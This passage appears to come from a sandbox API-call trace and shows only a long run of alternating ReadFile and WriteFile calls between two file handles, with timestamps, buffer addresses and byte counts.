lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.583] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.584] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.584] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.585] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.586] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.587] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.588] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.589] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.590] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.591] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.591] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.593] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.594] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.594] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.595] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.596] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.597] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.597] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x378, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.598] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.599] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.599] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.600] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x222, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.600] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.601] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.602] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.603] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.603] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.604] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.604] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.605] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.606] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.607] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.607] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.608] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.608] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.609] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.610] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.611] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.611] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.612] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.612] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.613] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.614] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.614] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.615] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x373, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.618] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.621] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.622] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.623] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.623] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.624] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x359, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x395, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.628] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.629] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, 